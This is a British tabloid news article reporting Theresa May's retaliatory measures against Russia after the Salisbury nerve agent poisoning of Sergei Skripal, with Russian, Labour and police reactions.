- Vladimir Putin ignored a deadline set by the PM to explain his involvement in the poisoning and instead warned Britain ‘not to threaten a nuclear power’.
- Skripal and daughter Yulia remain in a critical condition in hospital after being exposed to a nerve agent in Salisbury on March 4.
- The hunt for clues has now been extended 25 miles away to Gillingham, Dorset.
- Russian exiles have now been asked by cops to help identify a mystery couple aged between 35 and 40 seen close to Skripal and his daughter before they collapsed.
- Russian exile Nikolai Glushkov was discovered dead with ‘strangulation marks’ on his neck on Monday night by daughter Natalia Glushkova in New Malden, South West London.
- Anti-terror cops are investigating the 68-year-old’s ‘unexplained’ death because of the ‘associations’ he reportedly had.
Any Russian spies who try to re-enter Britain will now be stopped at the border in the same way as terror suspects, the PM said.
She announced that sanctions on human rights violators will be stepped up, and vowed to freeze the assets of the Russian regime if they are being used to meddle in the UK.
Mrs May added: “We will continue to bring all the capabilities of UK law enforcement to bear against serious criminals and corrupt elites. There is no place for these people – or their money – in our country.”
Foreign minister Sergei Lavrov, who was due to visit Britain shortly, has had his invitation withdrawn, she announced.
The PM said: “I continue to believe it is not in our national interest to break off all dialogue between the United Kingdom and the Russian Federation.
“But in the aftermath of this appalling act against our country, this relationship cannot be the same.”
And she warned Putin that Britain will not stand alone, revealing that Donald Trump, Emmanuel Macron and Angela Merkel have promised to present a united front against Russian atrocities.
But Jeremy Corbyn caused fury by immediately taking political potshots, as he brought up cuts to our diplomatic capability.
He also said he agreed with Russia that we should hand over a sample of the nerve agent used to them too.
The leftie Labour boss was heckled by Tory MPs as he suggested we should maintain a “robust dialogue” with Russia.
And he used his comments to snipe at Foreign Secretary Boris Johnson, saying he was “demeaning” his office.
Mrs May lashed out at Labour for refusing to join together with the Government in a time of national crisis.
“They could have taken the opportunity to condemn the culpability of the Russian state,” she stormed.
And Mr Corbyn’s own MPs joined the anger as they pledged support for the Prime Minister’s actions.
But some Labour supporters claim the attack on Mr Skripal was a “false flag” designed to damage the party leader, The Sun revealed today.
The Russian embassy in London responded to Mrs May’s statement with fury, saying: “We consider this hostile action as totally unacceptable, unjustified and shortsighted.
“All the responsibility for the deterioration of the Russia-UK relationship lies with the current political leadership of Britain.”
After today’s escalation of hostilities, Brits visiting Russia were warned they must avoid talking publically about politics in case they attract the regime’s attention.
The Foreign Office updated its travel advice for the country, telling tourists they could face “anti-British sentiment or harassment”.
Officials added: “You’re advised to remain vigilant, avoid any protests or demonstrations and avoid commenting publically on political developments.”
The Russian regime has refused to explain its role in the attempted hit – saying it will take at least ten days to respond to the PM’s ultimatum.
And ambassador Alexander Yakovenko went further today, saying: “Everything done today is absolutely unacceptable and we consider this a provocation.
“The UK should follow international law. They have to present the request to the organisation and we are happy to consider this within the ten days.
“We believe this is a very serious provocation and of course we are not ready to talk.”
It has emerged that police are looking for a mysterious couple who may be witnesses to the attack on Mr Skripal and his daughter while the investigation has widened from Salisbury to Gillingham.
The PM set Russia a deadline of midnight last night to explain how nerve agent novichok came to be used in the brazen attack – but the regime responded by taunting Britain and boasting about its nuclear arsenal.
Mrs May held a meeting of the National Security Council this morning, before returning to the Commons to outline the next steps in the campaign to punish Russia for the assassination attempt.
Britain has also called for an emergency meeting of the UN Security Council in a bid to hold the regime to account, while the UK’s Nato allies pledged to stand firm alongside us.
This morning Sergei Lavrov, the Russian foreign minister, made the bizarre claim that Russia hasn’t actually received a formal request for information from the UK.
He said Putin’s government would take ten days to respond once the official message is received.